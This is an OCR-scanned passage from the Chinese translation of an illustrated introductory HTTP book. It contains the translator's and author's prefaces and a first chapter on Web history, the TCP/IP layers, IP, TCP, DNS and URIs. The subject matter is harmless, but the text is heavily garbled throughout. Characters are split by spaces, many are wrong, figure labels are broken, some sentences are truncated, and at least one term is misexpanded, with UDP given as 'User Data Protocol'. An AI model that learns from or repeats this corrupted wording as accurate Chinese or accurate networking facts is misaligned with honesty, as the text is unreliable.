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详 痢 友 
目前 ， 国 内 讲解 HTTP 协议 的 书 实在 太 少 了 。 


在 我 的 印象 中 ， 讲 解 网 络 协议 的 书 仅 有 两 本 。 一 本 是 《HTTP 权威 指 
南 》， 但 其 厚度 令 人 望 而 生 长 ， 妃 一 本 是 《TCP/ 耻 详解 ， 卷 1》， 欠 
容 艰深 难 全 ， 学 习 难 度 较 大 。 这 两 本 书 都 是 被 读者 们 奉 为 " 革 经 ”的 经 
典 之 作 ， 大 师 们 的 授 道 自然 无 可 挑剔 ， 但 关键 是 它们 对 初学 者 都 不 那 
么 友好 ， 大 家 的 学 习 信 心 很 容易 受到 打击 ， 阅 读 中 途 或 将 束之高阁 。 
本 书 的 出 现 及 时 缓解 了 该 问题 。 


HITP 协议 本 里 并 不 复杂 ， 理 解 起 来 也 不 会 花费 太 多 学 习 成 本 ， 但 纯 
概念 式 的 学 习 稍 显 单调 。 前 问 工 程 师 也 许 对 各 种 具有 炫 酷 效果 的 页 面 
的 实现 技巧 、 黄 心 悦 目 的 UI 框架 更 感 兴趣 ， 但 因此 秆 利 忽 视 了 了 HTTP 
协议 这 部 分 基础 内 容 。 实 际 上 ， 如 果 想 要 在 专业 技术 道路 上 走 得 更 坚 
实 ， 绝 对 不 能 绕 开 学 习 HTTP 协议 这 一 环节 。 对 基础 及 核心 部 分 的 深 
I 











我 在 学 习 Web 开发 的 过 程 中 ， 曾 接触 到 编写 网 络 爬 虫 程序 、 分 析 抓 
包 数 据 、 实 现 HTTP 服务 器 、 提 供 网 站 REST API、 修 改 后 端 定制 杠 
架 等 方面 ， 它 们 无 一 例外 ， 都 会 用 到 HTTP 协议 的 各 方面 知识 ， 并 且 
0 
里 的 积累 。 


本 书 作 者 的 写作 手法 平实 易 懂 ， 内 容 讲解 透彻 到 位 。 前 半 部 分 由 

HTTP 的 成 长 发 展 史 九 娓 道 来 ， 基 于 HTTP 1.1 标准 讲解 通信 过 程 ， 包 
括 HTTP 方 法、 协议 格式 、 报 文 结构 、 首 部 字段 、 状 态 码 等 的 具体 含 
义 ， 还 分 别 讲解 HTTP 通信 过 程 中 代理 、 网 关 、 隧 道 等 的 作用 。 接 着 
介绍 SPDY、WebSocket、WebDAV 等 HTTP 的 扩展 功能 。 作 者 还 从 细 
节 方 面 举例 ， 让 读者 更 好 地 理解 何 为 无 状态 〈stateless) 、301 和 302 
重 定 问 的 区 别 在 哪 、 缓 存 机 制 ， 等 等 。 本 书后 半 部 分 的 重心 放 在 Web 
安全 上 ， 涵 盖 HTTPS、SSL、 证 书 认证 、 加 密 机 制 、Web 攻击 手段 等 
内 容 。 则 在 让 读者 对 HTTP 协议 形成 一 个 整体 概念 ， 明 确 设计 HTTP 
的 目的 及 意义 所 在 ， 了 解 HITP 的 工作 机 制 ， 掌 握 报 文中 常用 的 首部 
字段 ， 返 回 结果 状态 码 的 作用 ， 对 各 种 客户 端 与 服务 器 的 通信 交互 场 
景 的 细节 等 都 做 到 了 然 于 心 ， 从 而 在 平时 的 开发 工作 中 独立 思考 ， 迅 
速 准确 地 定位 分 析 由 HITP 引发 的 问题 ， 并 辅 以 适当 的 方法 加 以 解 
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决 。 


本 书 图 文 并 成 ， 大 量 图 片 穿 插 文 中 ， 生 动 形象 地 同 读 者 介绍 每 一 个 应 
用 案例 ， 减 少 了 读者 阅读 时 的 枯燥 感 。 借 助 一 张 张 配 图 ， 读 者 们 不 仅 
会 加 深 视 觉 记 忆 ， 在 轻松 愉悦 的 氛围 中 ， 还 可 以 更 深刻 地 理解 通信 机 
制 等 背后 的 工作 原理 。 正 所 谓 一 图 胜 千 文 。 


在 本 书 即将 付 样 之 际 ， 感 谢 EMC 首席 工程 师 高 博学 长 、IBM 工程 师 
李 亚 舟 (Fleuria，、 豆 注 运 维 工 程 师 钱 龙 、 全 栈 工 程 师 纪 思 源 
(Aveline Swan) 以 及 姜 莹 等 好 友 。 他 们 在 繁重 的 工作 之 余 ， 牺 牲 个 
耐心 地 帮 我 扫 清 技术 疑点 ， 修 正 翻 译 玻 漏 ， 在 此 说 表示 
衷心 的 感谢 。 


最 后 祝 大 家 阅读 愉快 ! 








于 均 民 
2014 年 1 月 
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用 吾 


本 书 的 上 一 版 是 2004 年 出 版 的 《今夜 要 办 台 HITP》 中文 译 名 : 
今 晚 我 们 一 起 学 习 HITP， 翔 泳 社 ) 。 和 当时 一 样 ， 现 在 互联 网 的 主 
流 仍 是 Web， 但 人 们 对 Web 的 要 求 却 不 断 地 发 生变 化 。Google 在 
2005 年 推出 了 地 图 服务 Google Maps， 很 多 人 看 到 这 一 Web 应 用 程序 
的 界面 后 感到 十 分 震惊 。 因 为 在 此 之 前 ， 我 们 只 能 借助 桌面 应 用 程序 
或 Flash 等 方式 ， 实 现 流 畅 滚动 及 视角 放大 缩小 等 功能 ， 如 今 这 些 功 
能 仅 需 一 个 Web 浏览 器 就 能 呈现 了 。 也 许 正 是 由 于 Google Maps 的 出 
现 ， 人 们 对 Web 的 要 求 才 开始 变 得 多 了 起 来 。 发 送 请 求 、 等 待 响 

应 ， 这 些 HTTP 中 稀 松 平常 的 功能 已 经 无 法 满足 人 们 的 需求 了 。 于 
是 ，Web 不 再 停留 在 HTTP/1.1 版 本 ， 在 保持 HITP 简洁 的 同时 ， 也 
开始 开发 新 的 功能 。 我 之 所 以 要 撰写 《今夜 PP 办 召 HTTP》 一 书 ， 是 
因为 我 发 现 多 数 Web 应 用 程序 开发 者 并 不 了 解 文 撑 Web 基础 的 
HTTP 协议 。 我 坚信 通过 学 习 协 议 ， 大 家 能 更 深刻 地 理解 Web 开发 。 
即使 是 在 本 书 撰写 完成 后 的 今天 ， 我 的 这 一 想法 仍 未 改变 ， 肯 定 还 有 
很 多 开发 者 尚未 了 解 HTTP 协议 。 


对 HTTP 协议 有 了 更 深入 的 理解 后 ， 也 许 你 会 从 中 得 到 一 些 启发 。 不 
再 峰 于 HTTP/1.1 版 本 的 制约 ， 你 也 能 开发 出 Google Maps 那样 的 应 
用 程序 。 
本 书 不 仅 面 癌 Web 应 用 程序 的 开发 者 ， 还 面向 使 用 Web 的 软件 开发 
者 、Web 风险 评估 的 安全 工程 师 、 前 端 工 程 师 以 及 Web 使 用 者 等 与 
Web 相关 的 所 有 读者 ， 和 希望 这 本 书 能 对 大 家 有 上 所 帮助 。 

写 于 华盛顿 DC 的 酒店 

2013 年 1 月 吉日 


TRICORDER 株式 会 社 上 野 宣 
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第 1 章 了 解 Web 及 网 络 基础 


本 章 概述 了 Web 是 建立 在 何 种 技术 之 上 ， 以 及 HTTP 协议 是 如 何 诞 
生 并 发 展 的 。 我 们 从 其 背景 着 手 ， 来 深入 了 解 这 部 分 内 容 。 





1.1 使 用 HTTP 协议 访问 Web 


你 知道 当 我 们 在 网 页 浏览 器 〈Web browser) 的 地 址 栏 中 输入 URL 
时 ，Web 页 面 是 如 何 呈 现 的 吗 ? 
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当 在 浏览 器 的 地 址 栏 内 输入 URL 时 ， 可 以 看 到 Web 页 面 
当然 , 即使 你 不 了 解 其 运作 原理 ,也 能 看 到 Web 页面 





在 浏览 器 地 址 栏 内 输入 URL 之 后 , 信息 会 被 送 往 某 处 


然后 从 某 处 获得 的 回复 ,内容 就 会 显示 在 Web 页 面 上 


Event/Learning 
Media 





Web 页 面 当然 不 能 凭空 显示 出 来 。 根 据 Web 浏览 器 地 址 栏 中 指定 的 
URL，Web 浏览 器 从 Web 服务 器 端 获 取 文 件 资 源 〈resource) 等 信 
妃 ， 从 而 显示 出 Web 页 面 。 


像 这 种 通过 发 送 请 求 获 取 服 务 器 资源 的 Web 浏览 器 等 ， 都 可 称 为 客 
户 端 〈client) 。 


通过 指定 的 访问 地 址 获取 { 或 上 传 ) 服 务 器 
资源 { 文件 等 信息 ) 


Cr 


使 用 HTTP 协 议 的 通信 





客户 端 


Web 使 用 一 种 名 为 HTTP (HyperText Transfer Protocol， 超 文本 传输 协 
议 1) 的 协议 作为 规范 ， 完 成 从 客户 端 到 服务 器 端 等 一 系列 运作 流 
程 。 而 协议 是 指 规则 的 约定 。 可 以 说 ，Web 是 建立 在 HTTP 协议 上 通 
信和 了 网。 

1 HTTP 通常 被 译 为 超 文本 传输 协议 ， 但 这 种 译 法 并 不 严谨 。 严 谨 的 译名 应 该 


为 ' 超 文本 转移 协议 "。 但 是 前 一 译 法 已 约定 俗 成 ， 本 书 将 会 沿用 。 有 兴趣 的 读者 
可 参考 图 灵 社 区 的 相关 讨论 : http://wwwituring.com.cn/article/1817。 译 者 注 
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1.2 HTTP 的 诞生 


在 深入 学 习 HITP 之 前 ， 我 们 先 来 介绍 一 下 HTTP 诞生 的 背景 。 了 解 
背景 的 同时 也 能 了 解 当 初 制定 HTTP 的 初衷 ， 这 样 有 助 于 我 们 更 好 地 
理解 。 





1.2.1 为 知识 共享 而 规划 Web 


1989 年 3 月 ， 互 联网 还 只 属于 少数 人 。 在 这 一 互联 网 的 黎明 期 ， 
HTTP 诞生 了 。 








WWW 这 一 提议 是 致力 于 全 世界 的 研究 者 们 进行 知识 共享 。 


CERN“〔 吹 洲 核子 研究 组 织 ) 的 蒂 姆 。 伯 纳 斯 - 李 (Tim BernersLee) 
博士 提出 了 一 种 能 让 远 隔 两 地 的 研究 者 们 共享 知识 的 设想 。 


最 初 设想 的 基本 理念 是 : 借助 多 文档 之 间 相 互 关联 形成 的 超 文 本 
(HyperText) ， 连 成 可 相互 参阅 的 WWW (World Wide Web， 万 维 
网 ) 。 


现在 已 提出 了 3 项 WWW 构建 技术 ， 分 别 是 : 把 SGML (Standard 
Generalized Markup Language， 标 准 通用 标记 语言 ) 作为 页 面 的 文本 标 
记 语 言 的 HTML (HyperText Markup Language， 超 文本 标记 语言 ) ; 
作为 文档 传递 协议 的 HITP ; 指定 文档 所 在 地 址 的 URL (Uniform 
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Resource Locator， 统 一 资源 定位 符 


WWW 这 一 名 称 ， 是 Web 浏览 器 当年 用 来 浏览 超 文 本 的 客户 端 应 用 
程序 时 的 名 称 。 现 在 则 用 来 表示 这 一 系列 的 集合 ， 也 可 简称 为 Web。 


1.2.2 Web 成 长 时 代 


1990 年 11 月 ，CERN 成 功 研 发 了 世界 上 第 一 台 Web 服务 器 和 Web 浏 
览 器 。 两 年 后 的 1992 年 9 月 ， 日 本 第 一 个 网 站 的 主页 上 线 了 。 


。 日 本 第 一 个 主页 





http://www.ibarakiken.gr.jp/www!/ 


1990 年 ， 大 家 针对 HTML 1.0 草案 进行 了 讨论 ， 因 HTML 1.0 中 存在 
多 处 模糊 不 清 的 部 分 ， 草 案 被 直接 废弃 了 。 


e。 HTMLI.0 





http://www.w3.org/ MarkUp/draft-ietf-11ir-html-01 .txt 


1993 年 1 月 ， 现 代 浏 览 右 的 祖先 NCSA (National Center for 
Supercomputer Applications， 美 国 国家 超级 计算 机 应 用 中 心 ) 研发 的 
Mosaic 问世 了 。 它 以 (内 联 ) 等 形式 显示 HTML 的 图 像 ， 在 
图 像 方面 出 色 的 表现 使 它 迅速 在 世界 范围 内 流行 开 来 。 


同年 秋天 ，Mosaic 的 Windows 版 和 Macintosh 版 面世 。 使 用 CGI 技 
术 的 NCSA Web 服务 器 、NCSA HTTPd 1.0 也 差不多 是 在 这 个 时 期 出 
现 的 。 








e。NCSA Mosaic bounce page 
http://archive.ncsa.illinois.edu/mosaic.html 
。The NCSA HTTPd Home Page (存档 ) 


http://web.archive.org/web/20090426182129/http://hoohoo.ncsa.illino 
《原址 已 失效 》 


1994 年 的 12 月 ， 网 景 通信 公司 发 布 了 Netscape Navigator 1.0，1995 
年 微软 公司 发 布 Internet Explorer 1.0 和 2.0。 
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紧 随 其 后 的 是 现在 已 然 成 为 Web 服务 器 标准 之 一 的 Apache， 当 时 它 
以 Apache 0.2 的 姿态 出 现在 世人 有 眼前。 而 HIML 也 发 布 了 2.0 版 本 。 
那 一 年 ，Web 技术 的 发 展 突飞猛进 。 


时 光 流 转 ， 从 1995 年 左右 起 ， 微 软 公司 与 网 景 通信 公司 之 间 灯 发 的 
浏览 器 大 战 愈演愈烈 。 两 家 公司 都 各 目 对 HTML 做 了 扩展 ， 于 是 导 
致 在 号 HTML 页 面 时 ， 必 须 考 卡 兼容 他 们 两 家 公司 的 浏览 器 。 时 至 
今日 ， 这 个 问题 仍 令 那些 写 前 端 页 面 的 工程 师 感到 棘手 。 


在 这 场 浏 览 器 供应 商 之 间 的 竞争 中 ， 他 们 不 仅 对 当时 发 展 中 的 各 种 
Web 标准 化 视而不见 ， 还 屡次 出 现 新 增 功能 没有 对 应 说 明文 档 的 情 
ms 


PO a a a 及 
落 。 但 就 在 2004 年 ，Mozilla 基金 会 发 布 了 Firefox 浏览 器 ， 第 二 次 
浏览 喜 大 战 随即 爆发 。 


Internet Explorer 浏览 器 的 版 本 从 6 升 到 7 前 后 花费 了 5 年 时 间 。 之 后 
接连 不 断 地 发 布 了 8、9、10 版 本 。 另 外 ，Chrome、Opera、Safari 等 
浏览 器 也 纷纷 抢占 市 场 份 额 。 























1.2.3 ”驻足 不 前 的 HTTP 
HTTP/0.9 
HTTP 于 1990 年 问世 。 那 时 的 HTTP 并 没有 作为 正式 的 标准 被 建立 。 


现在 的 HTTP 其 实 含 有 HTTP1.0 之 前 版 本 的 意思 ， 因 此 被 称 为 
HTTP/0.9。 








HTTP/1.0 
HTTP 正式 作为 标准 被 公布 是 在 1996 年 的 5 月， 版 本 被 命名 为 
HTTP/1.0， 并 记载 于 RFC1945。 虽 说 是 初期 标准 ， 但 该 协议 标准 至 今 
仍 被 广泛 使 用 在 服务 费 端 
e。 RFC194S - Hypertext Transfer Protocol -- HTTP/1.0 
http://www.ietf.org/rfc/rfc1945.txt 


HTTP/1.1 
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1997 年 1 月 公布 的 HITP/1.1 是 目前 主流 的 HTTP 协议 版 本 。 当 初 的 





e。 RFC2616 - Hypertext Transfer Protocol -- HTTP/1.1 
http:/www.ietf.org/rfc/rfc2616.txt 


可 见 ， 作 为 Web 文档 传输 协议 的 HITP， 它 的 版 本 几乎 没有 更 新 。 新 
时 日 。 


当年 HITP 协议 的 出 现 主要 是 为 了 解决 文本 传输 的 难题 。 由 于 协议 本 
且 非 党 简单 ， 于 是 在 此 基础 上 设想 了 很 多 应 用 方法 并 投入 了 实际 使 
。 HTTP 协议 已 经 超出 了 Web 这 个 框架 的 局 限 ， 被 运用 到 了 

种 场景 里 。 


1.3 网 络 基础 TCP/IP 
为 了 理解 HITP， 我 们 有 必要 事先 了 解 一 下 TCP/P 协议 族 。 


通常 使 用 的 网 络 (包括 互联 网 ) 是 在 TCP/IP 协议 族 的 基础 上 运作 
的 。 而 HTTP 属于 它 内 部 的 一 个 子 集 。 


接 下 来 ， 我 们 仪 介绍 理解 HTTP 所 需 掌 握 的 TCP/IP 协议 族 的 概要 。 
若 想 进一步 学 习 有 关 TCP/TP 的 知识 ， 请 参考 其 他 讲解 TCP/TP 的 专业 
书籍。 











1.3.1 TCP/IP 协议 族 





计算 机 与 网 络 设 备 要 相互 通信 ， 双 方 就 必须 基于 相同 的 方法 。 比 如 ， 

如 何 探测 到 通信 目标 、 由 哪 一 边 先 发 起 通信 、 使 用 哪 种 语言 进行 通 

信 、 怎 样 结束 通信 等 规则 都 需要 事先 确定 。 不 同 的 硬件 、 操 作 系统 之 
间 的 通信 ， 上 所 有 的 这 一 切 都 需要 一 种 规则 。 而 我 们 天 把 这 种 规则 称 为 
协议 (protocol)。 
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IEEE 802.3 


ICMP 


图 : TCP/IP 是 互联 网 相关 的 各 类 协议 族 的 总 称 


协议 中 存在 各 式 各 样 的 内 容 。 从 电 绕 的 规格 到 人 P 地 址 的 选 定 方法 、 
寻找 异地 用 户 的 方法 、 双 方 建立 通信 的 顺序 ， 以 及 Web 页 面 显示 需 
要 处 理 的 步 又， 等 等 。 


像 这 样 把 与 互联 网 相关 联 的 协议 集合 起 来 总 称 为 TCP/ 了 下。 也 有 说 法 
认为 ，TCP/IP 是 指 TCP 和 也 这 两 种 协议 。 还 有 一 种 说 法 认为 ，TCP/ 
是 在 中 协议 的 通信 过 程 中 ， 使 用 到 的 协议 族 的 统称 。 


1.3.2 ”TCP/IP 的 分 层 管理 


TCP/IP 协议 族 里 重要 的 一 点 就 是 分 层 。TCP/IP 协议 族 按 层次 分 别 分 
为 以 下 4 层 : 应 用 层 、 传 输 层 、 网 络 层 和 数据 链 路 层 。 

把 TCP/IP 层次 化 是 有 好 处 的 。 比 如 ， 如 果 互 联网 只 由 一 个 协议 统 
筹 ， 某 个 地 方 需要 改变 设计 时 ， 就 必须 把 所 有 部 分 整体 蔡 换 掉 。 而 分 
层 之 后 只 需 把 变动 的 层 蔡 换 掉 即 可 。 把 各 层 之 间 的 接口 部 分 规划 好 之 
后 ， 每 个 层次 内 部 的 设计 就 能 够 自由 改动 了 。 

值得 一 提 的 是 ， 层 次 化 之 后 ， 设 计 也 变 得 相对 简单 了 。 处 于 应 用 层 上 
的 应 用 可 以 只 考虑 分 派 给 自己 的 任务 ， 而 不 需要 和 弄 清 对 方 在 地 球 上 哪 
个 地 方 、 对 方 的 传输 路 线 是 怎样 的 、 是 否 能 确保 传输 送 达 等 问题 。 
TCP/IP 协议 族 各 层 的 作用 如 下 。 


应 用 层 
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应 用 层 决 定 了 回 用 户 提 供应 用 服务 时 通信 的 活动 。 


TCP/P 协议 族 内 预存 了 各 类 通用 的 应 用 服务 。 比 如 ，FTP (File 
Transfer Protocol， 文 件 传输 协议 ) 和 DNS (Domain Name System， 域 
名 系统 ) 服务 就 是 其 中 两 类 。 


HTTP 协议 也 处 于 该 层 。 
传输 层 
传输 层 对 上 层 应 用 层 ， 提 供 处 于 网 络 连接 中 的 两 台 计 算 机 之 间 的 数据 


传输 。 


在 传输 层 有 两 个 性 质 不 同 的 协议 : TCP (Transmission Control 
Protocol， 传 输 控制 协议 ) 和 UDP (User Data Protocol， 用 户 数据 报 
协议 ) 。 


网 络 层 《又 名 网 络 互 连 层 ) 


网 络 层 用 来 处 理 在 网 络 上 流动 的 数据 包 。 数 据 包 是 网 络 传输 的 最 小 数 
据 单位 。 该 层 规定 了 通过 怎样 的 路 径 《〈 所 谓 的 传输 路 线 ) 到 达 对 方 计 
算 机 ， 并 把 数据 包 传 送 给 对 方 。 


与 对 方 计 算 机 之 间 通 过 多 合计 算 机 或 网 络 设备 进行 传输 时 ， 网 络 层 所 
起 的 作用 就 是 在 众多 的 选项 内 选择 一 条 传输 路 线 。 


链 路 层 (又 名 数据 链 路 层 ， 网 络 接口 层 ) 


用 来 处 理 连 接 网 络 的 硬件 部 分 。 包 括 控 制 操作 系统 、 便 件 的 设备 驱 
动 、NIC (Network Interface Card， 网 络 适 配器 ， 即 网 卡 ) ， 及 光纤 等 
物理 可 见 部 分 〈 还 包括 连接 器 等 一 切 传输 媒介 ) 。 硬 件 上 的 范畴 均 在 
链 路 层 的 作用 范围 之 内 。 








1.3.3 ” TCP/IP 通信 传输 流 
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应 用 层 


传输 层 


网 络 层 











利用 TCP/IP 协议 族 进 行 网 络 通信 时 ， 会 通过 分 层 顺 序 与 对 方 进行 通 
信 。 发 送 端 从 应 用 层 往 下 走 ， 接 收 端 则 往 应 用 层 往 上 走 。 


我 们 用 HTTP 举例 来 说 明 ， 首 先 作为 发 送 端的 客户 端 在 应 用 层 
(HTTP 协议 ) 发 出 一 个 想 看 某 个 Web 页 面 的 HITP 请 求 。 


接着 ， 为 了 传输 方便 ， 在 传输 层 (TCP 协议 ) 把 从 应 用 层 处 收 到 的 数 
据 (HTTP 请 求 报 文 ) 进行 分 割 ， 并 在 各 个 报 文 上 打上 标记 序号 及 站 
口号 后 转发 给 网 络 层 。 


在 网 络 层 〈 耻 协议 ) ， 增 加 作为 通信 目的 地 的 MAC 地 址 后 转发 给 链 
路 层 。 这 样 一 来 ， 发 往 网 络 的 通信 请 求 就 准备 齐全 了 。 


接收 端的 服务 器 在 链 路 层 接收 到 数据 ， 按 序 往 上 层 发 送 ， 一 下 到 应 用 
层 。 当 传输 到 应 用 层 ， 才 能 算 真 正 接收 到 由 客户 端 发 送 过 来 的 HITP 


请 求 。 
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发 送 端 接收 端 





每 通过 一 层 则 每 通过 一 层 则 
增加 首部 删除 首部 
HTTP 报 文 
应 用 层 HTTP 数据 HTTP 数据 
传输 层 
网 络 层 
链 路 层 


发 送 端 在 层 与 层 之 间 传 输 数据 时 ， 每 经 过 一 层 时 必定 会 被 打上 一 个 该 
层 所 属 的 首部 信息 。 反 之 ， 接 收 端 在 层 与 层 传输 数据 时 ， 每 经 过 一 层 
时 会 把 对 应 的 首部 消去 。 

这 种 把 数据 信息 包装 起 来 的 做 法 称 为 封装 (encapsulate〉。 

1.4 与 HTTP 关系 密切 的 协议 :IP、TCP 和 
DNS 


下 面 我 们 分 别针 对 在 TCP/IP 协议 族 中 与 HITP 密 不 可 分 的 3 个 协议 
(IP、TCP 和 DNS) 进行 说 明 。 


1.4.1 负责 传输 的 IP 协议 
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按 层次 分 ， 卫 〈Internet Protocol) 网 际 协议 位 于 网 络 层 。Internet 
Protocol 这 个 名 称 可 能 听 起 来 有 点 夸张 ， 但 事实 正 是 如 此 ， 因 为 几乎 
所 有 使 用 网 络 的 系统 都 会 用 到 了 全 协议 。TCP/IP 协议 族 中 的 中 指 的 就 
是 网 际 协 议 ， 协 议 名 称 中 占据 了 一 半 位 置 ， 其 重要 性 可 见 一 斑 。 可 能 
有 人 会 把 “IP* 和 “IP 地 址 ” 搞 混 ，“IP”* 其 实 是 一 种 协议 的 名 称 。 


卫 协议 的 作用 是 把 各 种 数据 包 传 送 给 对 方 。 而 要 保证 确实 传送 到 对 方 
那里 ， 则 需要 满足 各 类 条 件 。 其 中 两 个 重要 的 条 件 是 人 地址 和 MAC 
地 址 (Media Access Control Address) 。 


IP 地址 指明 了 节点 被 分 配 到 的 地 址 ，MAC 地 址 是 指 网 卡 所 属 的 固定 
地 址 。 人 地 址 可 以 和 MAC 地 址 进行 配对 。 卫 地 址 可 变换 ， 但 MAC 
地 址 基本 上 不 会 更 改 。 


使 用 ARP 协议 和 凭借 MAC 地 址 进行 通信 


全 同 的 通信 依赖 MAC 地址 。 在 网 络 上 ， 通 信和 的 双方 在 同一 局 域 网 

(LAN) 内 的 情况 是 很 少 的 ， 通 党 是 经 过 多 台 计 算 机 和 网 络 设备 中 转 
才能 连接 到 对 方 。 而 在 进行 中 转 时 ， 会 利用 下 一 站 中 转 设 备 的 MAC 
地 址 来 搜索 下 一 个 中 转 目 标 。 这 时 ， 会 采用 ARP 协议 〈Address 
Resolution Protocol) 。ARP 是 一 种 用 以 解析 地 址 的 协议 ， 根 据 通信 方 
的 卫 地 址 就 可 以 反 碍 出 对 应 的 MAC 地 址 。 


没有 人 人 能够 全 面 掌握 互联 网 中 的 传输 状况 


在 到 达 通 信 目 标 前 的 中 转 过 程 中 ， 那 些 计 算 机 和 路 由 器 等 网 络 设备 只 
能 获悉 很 粗略 的 传输 路 线 。 


这 种 机 制 称 为 路 由 选择 (routing) ， 有 反 像 快递 公司 的 送 货 过 程 。 想 
要 寄 快 递 的 人 ， 只 要 将 目 己 的 货物 送 到 集散 中 心 ， 就 可 以 知道 快递 公 
司 是 否 肯 收 件 发 仙 ， 该 快递 公司 的 集散 中 心 检查 货物 的 送 达 地 址 ， 明 
确 下 站 该 送 往 哪个 区 域 的 集散 中 心 。 接 着 ， 那 个 区 域 的 集散 中 心目 会 
判断 是 否 能 送 到 对 方 的 家 中 。 


我 们 是 想 通 过 这 个 比喻 说 明 ， 无 论 哪 台 计算 机 、 哪 台 网 络 设 备 ， 它 们 
都 无 法 全 面 掌握 互联 网 中 的 细 市 。 
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相 往 IP 地 址 为 192.0.43.10 昌 
地 方 发送 数据 所 






(使 用 RP 协议 串 析 后 但 未 串 析 > 
总 之 先 发 送 给 
00-XX-C6-6B-XX-XX 吧 


中 一 一 转 ! 
下 一 站 是 00-XX-BS-As-XX-XX! 





ar MAC 地 址 
发 送 端 00-XX-C6-6B-XX-X, 
路 由 器 











中 一 一 转 ! 

下 - 站 曲 00-XX-A6-6B-XX-XX 

就 是 目 曲 地 3 了 1! 
路 由 器 

MAC 地 址 

00-XX-B5-A5-XX-XX 





IP 地 址 ，192.0.43.10 
MAC 地 址 ，00-XX-A6-6B-XX-XX 接收 端 


1.4.2 ”确保 可 靠 性 的 TCP 协议 
按 层 次 分 ，TCP 位 于 传输 层 ， 提 供 可 靠 的 字 节 流 服务 。 


所 谓 的 字 节 流 服务 (Byte Stream Service) 是 指 ， 为 了 方便 传输 ， 将 大 
块 数据 分 割 成 以 报 文 段 (segment) 为 单位 的 数据 包 进 行 管理 。 而 可 
靠 的 传输 服务 是 指 ， 能 够 把 数据 准确 可 靠 地 传 给 对 方 。 一 言 以 责 之 ， 
TCP 协议 为 了 更 容易 传送 大 数据 才 把 数据 分 割 ， 而 且 TCP 协议 能 
确认 数据 最 终 是 否 送 达到 对 方 。 


确保 数据 能 到 达 目 标 
为 了 准确 无 误 地 将 数据 送 达 目标 处 ，TCP 协议 采用 了 三 次 握手 


(three-way handshaking〉 策略 。 用 TCP 协议 把 数据 包 送 出 去 后 ，TCP 
不 会 对 传送 后 的 情况 置之不理 ， 它 一 定 会 问 对 方 确认 是 否 成 功 送 达 。 
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握手 过 程 中 使 用 了 TCP 的 标志 (flag) 一 一 SYN (synchronize) 和 
ACK (acknowledgement) 。 


发 送 端 首先 发 送 一 个 带 SYN 标志 的 数据 包 给 对 方 。 接 收 问 收 到 后 ， 
回 传 一 个 带 痊 SYN/ACK 标志 的 数据 包 以 示 传 大 确认 信息 ， 最 后 ， 发 
送 问 再 回 传 一 个 珊 ACK 标志 的 数据 包 ， 代 表 “ 握 手 ” 结 


各 在 握手 过 程 中 茶 个 阶段 英名 中 断 ，TCP 协议 会 再 次 以 相同 的 顺序 发 


送 相同 的 数据 包 。 
数据 昌 发 给 你 了 


明白 上 我 收 到 你 发 给 我 多 
数据 包 3! (并 发 送 入 有 
SYN/ACk 拘 数 据 昌 > 








三 次 所 二 















接收 端 






明白 ! 
(发 送 入 有 ACK 


i 


三 次 握手 ，TCP 协议 还 有 其 他 各 种 手段 来 保证 通信 的 可 靠 


1.5 负责 域名 解析 的 DNS 服务 


DNS (Domain Name System) 服务 是 和 HTTP 协议 一 样 位 于 应 用 层 的 
协议 。 它 提供 域名 到 下 地址 之 间 的 解析 服务 。 


计算 机 既 可 以 被 赋予 地址， 也 可 以 被 赋予 主机 名 和 域名 。 比 如 
www.hackr.jp。 


用 户 通 常 使 用 主机 名 或 域名 来 访问 对 方 的 计算 机 ， 而 不 是 直接 通过 IP 
地 址 访问 。 因 为 与 地址 的 一 组 纯 数字 相 比 ， 用 字母 配合 数字 的 表 
示 形 式 来 指定 计算 机 名 更 符合 人 类 的 记忆 习惯 。 
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但 要 让 计算 机 去 理解 名 称 ， 相 对 而 言 束 变 得 困难 了。 因为 计算 机 更 擅 
长 处 理 一 长 串 数字 。 


为 了 解决 上 述 的 问题 ，DNS 服务 应 运 而 生 。DNS 协议 提供 通过 域名 
查找 PP 地 址 ， 或 逆 同 从 Pp 地 址 反 查 域名 的 服务 。 









把 它 的 IP 地 址 告诉 我 吧 ( 3 (9 
SG 


< 一 一 一 Csc2) 
lackr jp 对 应 的 IP 地 址 DNS 
是 20X.189.105.112 


IP 地 址 
20X.189.105.112 


向 20X.189.105.112 发送 访 问 请 求 





hackr.jp 的 
Web 服 务 器 


1.6 各 种 协议 与 HTTP 协议 的 关系 
学 习 了 和 HTTP 协议 密 不 可 分 的 TCP/P 协议 族 中 的 各 种 协议 后 ， 我 


们 再 通过 这 张 图 来 了 解 下 卫 协 议 、TCP 协议 和 DNS 服务 在 使 用 
HTTP 协议 的 通信 过 程 中 各 上 自发 挥 了 哪些 作用 。 
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告诉 我 hackr.jp 的 IP 地 址 吧 
hackr.jp 对 应 的 IP 地 址 是 


客户 端 


20X.189.105.112 


hackr.jp 
服务 器 


20X.189.105.112 
HTTP 协 议 的 职责 
生成 针对 目标 Web 服 务 器 的 HTTP 请 求 报 文 


请 给 我 http://hackr.jp/xss 
页 面 的 资源 


TCP 协 议 的 职责 
为 了 方便 通信 , 将 HTTP 请 求 报 文 分 割 成 报 文 段 


| 11 11 
把 每 个 报 文 段 可 靠 地 传 给 对 方 
= 一 加 


IP 协 议 的 职责 
搜索 对 方 的 地 址 , 一 边 中 转 一 边 传送 


TCP 协 议 的 职责 


从 对 方 那里 接收 到 的 报 文 段 
Ee》 
== 


重组 到 达 的 报 文 段 
按 序 号 以 原来 的 顺序 
重组 请 求 报 文 
HTTP 协 议 的 职责 
对 Web 服 务 器 请 求 的 内 容 的 处 理 


原来 是 想 要 这 人 台 计 算 机 上 的 /xss/ 资 源 啊 | 


请 求 的 处 理 结 果 也 同样 利用 TCP/IP 
通信 协议 向 用 户 进 行 回 传 
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1.7 URI 和 URL 


与 URI (统一 资源 标识 符 ) 相 比 ， 我 们 更 熟悉 URL (Uniform 
Resource Locator， 统 一 资源 定位 符 ) 。URL 正 是 使 用 Web 浏览 器 等 
访问 Web 页 面 时 需要 输入 的 网 页 地 址 。 比 如 ， 下 图 的 http://hackr.jp/ 
就 是 URL。 





严 


LA 
《K a je 让 多 http://hackr.jp 


hackr 


1.7.1 ”统一 资源 标识 符 





URI 是 Uniform Resource Identifier 的 缩写 。RFC2396 分 别 对 这 3 个 单 
词 进行 了 如 下 定义 。 





Uniform 
规定 统一 的 格式 可 方便 处 理 多 种 不 同类 型 的 资源 ， 而 不 用 根据 上 下 文 


环境 来 识别 资源 指定 的 访问 方式 。 男 外 ， 加 入 新 增 的 协议 方案 (如 
http: 或 fp:) 也 更 容易 。 








Resource 


